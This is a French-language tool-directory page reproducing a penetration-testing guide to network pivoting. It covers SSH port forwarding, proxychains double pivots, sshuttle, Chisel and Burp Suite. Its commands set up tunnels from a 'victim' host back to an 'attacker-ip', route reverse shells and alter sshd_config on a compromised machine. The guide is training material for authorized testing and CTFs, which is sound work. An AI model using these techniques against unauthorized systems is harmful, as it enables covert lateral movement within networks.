Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pentest-pivoting — Un guide compact sur le pivoting réseau pour les tests d'intrusion / challenges CTF. | Kitploit
Outils/GitHubGitHub/t3l3machus/pentest-pivoting
Proxies Web et InterceptionMouvement LatéralSécurité RéseauCTFTests d'IntrusionApprentissage et ÉducationRed TeamingRessources Organisées
GitHubt3l3machus/pentest-pivoting

pentest-pivoting

Un guide compact sur le pivoting réseau pour les tests d'intrusion / challenges CTF.

Voir le dépôt
228441il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Guide de Pivotage

Table des matières

  1. Notes importantes
  2. Redirection de port dynamique SSH
  3. Redirection de port distant SSH
  4. Redirection de port local SSH
  5. Double Pivotage
  6. sshuttle
  7. Chisel
  8. Utiliser Burpsuite comme proxy
  9. Ressources utiles

Notes importantes

  • N'utilisez pas les requêtes ICMP echo (ping) pour tester les proxys SOCKS.
    SOCKS est un protocole Internet qui échange des paquets réseau entre un client et un serveur via un serveur proxy. Concrètement, un serveur SOCKS transmet les connexions TCP vers une adresse IP arbitraire et fournit un moyen de transférer les paquets UDP.
    Vous devez le tester en utilisant un protocole basé sur TCP (par exemple, essayez de vous connecter en SSH ou d'envoyer une requête HTTP GET à un hôte à travers le tunnel de pivot).

  • NMAP doit être utilisé avec le scan de connexion TCP (-sT) et sans ping (-Pn)
    Cela s'applique également aux scans de version (-sV) et de scripts (-sC). Ils doivent être utilisés en combinaison avec -sT et -Pn.
    Exemples :

    root@kitploit:~
    proxychains nmap -sT -Pn -p- x.x.x.x
    proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445 x.x.x.x
    

    Astuce : Vous pouvez uploader naabu sur la machine victime et scanner comme un chef.

  • Utiliser des scripts et des binaires avec proxychains
    Une astuce pour utiliser proxychains est de s'assurer que si vous exécutez un programme interprété (comme un script Python), il est judicieux de référencer explicitement le binaire Python avant ce script, même si le script commence par un shebang, par exemple :

    root@kitploit:~
    proxychains4 [-q -f proxychains.conf] python python_script.py
    

    Sans cette référence explicite à l'interpréteur du script, le trafic généré par le script peut parfois ne pas être routé via le proxy comme prévu, et la connexion réseau échouera. Source de l'astuce

  • Décommentez la ligne « quiet mode » dans /etc/proxychains.conf pour éviter une sortie standard qui peut être frustrante.
    Ce n'est qu'une suggestion.

Redirection de port dynamique SSH

Permet de créer une socket sur la machine locale (client ssh), qui agit comme un serveur proxy SOCKS. Lorsqu'un client se connecte à ce port, la connexion est transférée vers la machine distante (serveur ssh), puis vers un port dynamique sur la machine de destination.

Comment la configurer :

  1. Modifiez /etc/proxychains.conf et appliquez ce qui suit :

    • Décommentez Dynamic chain.
    • Commentez Strict chain et Random chain.
    • Ajoutez la ligne socks4 127.0.0.1 9050 à la fin du document (liste des proxys), enregistrez et fermez le fichier. *Vous pouvez, bien sûr, utiliser un port différent.
  2. Configurez la redirection de port dynamique SSH :

root@kitploit:~
ssh -D 127.0.0.1:9050 user@victim-IP

Exemples d'utilisation :
Avec x.x.x.x comme adresse IP d'un hôte appartenant au réseau tunnelisé :

root@kitploit:~
proxychains nmap -sT -Pn -p- x.x.x.x
proxychains smbmap -H x.x.x.x
proxychains ssh [email protected]

Pour utiliser Firefox à travers le tunnel :

root@kitploit:~
proxychains firefox

Redirection de port distant SSH

Si vous cherchez comment obtenir un reverse shell à travers un tunnel de pivot, c'est ce qu'il vous faut. Elle permet de transférer un port sur la machine distante (victime) vers un port sur la machine locale (attaquant).

Comment la configurer :

  1. Connectez-vous en SSH à la machine victime.

  2. Modifiez /etc/ssh/sshd_config et appliquez ce qui suit :

    • Décommentez GatewayPorts no et remplacez-le par Yes. Enregistrez et fermez le fichier.

    *C'est très important et de nombreux guides sur le web ne le mentionnent pas. Si vous ne le faites pas, vous ne pourrez configurer le tunnel que sur 127.0.0.1 plutôt que sur 0.0.0.0, ce qui finira par ne pas transférer le trafic lorsqu'il provient d'un hôte autre que localhost.

    • Redémarrez le service SSH pour que les changements prennent effet. sudo service ssh restart
    • Quittez et revenez à votre machine.
  3. Configurez la redirection de port distant SSH :
    Essentiellement, après l'avoir configurée comme mentionné, la commande est aussi simple que ceci :

root@kitploit:~
ssh -R 2222:*:2222 user@victim-IP

Pour tester si cela fonctionne, vous pouvez faire ce qui suit :
Mettez en place un listener (par exemple netcat) sur votre machine attaquante (sur le port que vous avez configuré pour la redirection distante, dans cet exemple 2222) et faites une requête depuis la machine victime vers elle-même (localhost). Dans cet exemple, ce serait nc 127.0.0.1 2222. Si votre machine attaquante reçoit la connexion, cela signifie que a) cela fonctionne et b) chaque connexion depuis les hôtes de pivot vers victimip:2222 sera transférée vers la machine attaquante.

Vous pouvez configurer plusieurs ports comme ceci :

root@kitploit:~
ssh -R 2222:*:2222 -R 3333:*:3333 user@victim-IP

Attention : Les requêtes provenant d'hôtes étrangers (réseau de pivot) doivent être adressées à l'IP de la victime afin d'être renvoyées vers la machine attaquante.

*Vous pouvez également implémenter la redirection de port distant en vous connectant en SSH depuis la victime vers la machine attaquante.

Redirection de port local SSH

La redirection de port local vous permet de transférer un port sur la machine locale (attaquant) vers un port sur la machine distante (victime). Particulièrement utile pour scanner les ports locaux sur la victime.

Utilisation :

root@kitploit:~
ssh user@victim-IP -L 8888:127.0.0.1:8086

Vous pouvez maintenant utiliser par exemple nmap pour scanner le port 8086 sur la machine victime comme ceci :

root@kitploit:~
nmap -Pn -n -p8888 -sV 127.0.0.1

Double Pivotage

Un exemple de mise en œuvre du double pivotage avec la redirection de port dynamique SSH et Proxychains.

Concept :
Supposons que nous ayons les 4 machines suivantes.

IPRôle
10.10.10.10Attaquant
10.10.10.11Jumphost1
172.16.1.12Jumphost2
172.16.2.13Jumphost3

L'attaquant peut atteindre Jumphost1.
Jumphost1 peut atteindre Jumphost2.
Jumphost2 peut atteindre Jumphost3.

  1. Pour atteindre Jumphost2, suivez les instructions de Redirection de port dynamique SSH mentionnées précédemment, contre Jumphost1.
  2. Pour atteindre Jumphost3, modifiez /etc/proxychains.conf et ajoutez une autre entrée de proxy à la fin du document. La fin de votre proxychains.conf ressemblera maintenant à ceci :
root@kitploit:~
...
socks4 127.0.0.1 9050
socks4 127.0.0.1 9999
  1. Connectez-vous en SSH à Jumphost1 et configurez une autre redirection de port dynamique vers Jumphost2 (le port local que vous choisissez doit être le même que celui défini pour votre deuxième entrée de proxy dans proxychains.conf) :
root@kitploit:~
ssh -D 127.0.0.1:9999 user@Jumphost2

Vous devriez maintenant pouvoir atteindre Jumphost3.

sshuttle

sshuttle vous permet de créer une connexion VPN de votre machine vers n'importe quel serveur distant via ssh, à condition que ce serveur dispose de python 2.3 ou supérieur. Pour fonctionner, vous devez avoir un accès root sur la machine locale, mais vous pouvez avoir un compte normal sur le serveur. Il est possible d'exécuter sshuttle plus d'une fois simultanément sur une seule machine cliente, en se connectant à un serveur différent à chaque fois, ce qui vous permet d'être sur plusieurs VPN à la fois. Consultez le dépôt GitHub de sshuttle.

Utilisation :
En supposant que nous voulions pivoter vers 172.16.2.0/16 :

root@kitploit:~
sshuttle -vvr root@victim 172.16.2.0/16

Si vous voulez utiliser une clé ssh :

root@kitploit:~
sshuttle -vvr root@victim --ssh-cmd 'ssh -i ~/.ssh/id_rsa' 172.16.2.0/16

Chisel

Chisel est un tunnel TCP/UDP rapide, transporté sur HTTP, sécurisé via SSH. Un seul exécutable incluant à la fois le client et le serveur. Écrit en Go (golang). C'est incroyablement génial et utile.

Installation :
Vous pouvez facilement installer chisel sur kali :

root@kitploit:~
apt install chisel

Pour l'utiliser, vous devez également uploader le binaire chisel sur la victime. Vous pouvez télécharger des versions précompilées ici.

Exemple de redirection de port local
Sur votre machine attaquante :

root@kitploit:~
chisel server -p 8000 --reverse

Sur la machine victime :

root@kitploit:~
./chisel_1.7.7_linux_amd64 client attacker-ip:8000 R:1234:127.0.0.1:8443

Cela va transférer le trafic du port 1234 de la machine attaquante vers le port 8443 de la machine victime.

Utiliser Burpsuite comme proxy

Burpsuite prend en charge la configuration de proxys, une fonctionnalité incroyablement utile et puissante.

Comment la configurer :
Lancez Burpsuite et appliquez ce qui suit :

  • Allez dans Proxy/Options et cliquez sur add dans la section Proxy Listeners.
  • Définissez un port de liaison et une interface.
  • Dans le deuxième onglet, définissez l'hôte et le port vers lesquels vous voulez rediriger le trafic.

En combinaison avec la mise en place d'une redirection de port dynamique SSH ou de sshuttle, vous pouvez maintenant utiliser Burpsuite pour faire pivoter le trafic vers les hôtes souhaités en envoyant le trafic à votre port de liaison localhost. Un exemple utile avec gobuster dir brute à travers le tunnel (en supposant que vous avez défini le port 2222 comme port de redirection) :

root@kitploit:~
gobuster dir -u http://127.0.0.1:2222 -t 40 -w /some/dirlist.txt

Ressources utiles

  • https://artkond.com/2017/03/23/pivoting-guide/
  • https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/
  • https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663
Télécharger l’outil